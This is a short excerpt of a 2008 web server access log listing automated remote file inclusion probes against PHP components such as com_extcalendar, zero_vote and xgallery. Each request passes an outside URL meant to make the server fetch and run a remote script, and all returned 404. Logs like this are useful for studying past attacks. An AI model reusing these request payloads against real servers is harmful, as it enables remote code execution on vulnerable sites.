208.179.126.38 - - [16/Jan/2008:17:10:50 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.falmeriafs.com//components/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
64.38.43.162 - - [16/Jan/2008:17:10:59 -0800] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://59.105.213.128/appserv/ascid.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.43.162 - - [16/Jan/2008:17:10:59 -0800] "GET //skin/zero_vote/error.php?dir=http://59.105.213.128/appserv/ascid.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.43.162 - - [16/Jan/2008:17:11:00 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://59.105.213.128/appserv/ascid.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.43.162 - - [16/Jan/2008:17:13:13 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://59.105.213.128/appserv/ascid.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.147.237.116 - - [16/Jan/2008:17:13:26 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://membres.lycos.fr/thektools/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
66.147.237.116 - - [16/Jan/2008:17:13:26 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://membres.lycos.fr/thektools/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
74.205.81.50 - - [16/Jan/2008:17:15:59 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.robosborn.com/blog/wp-content/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
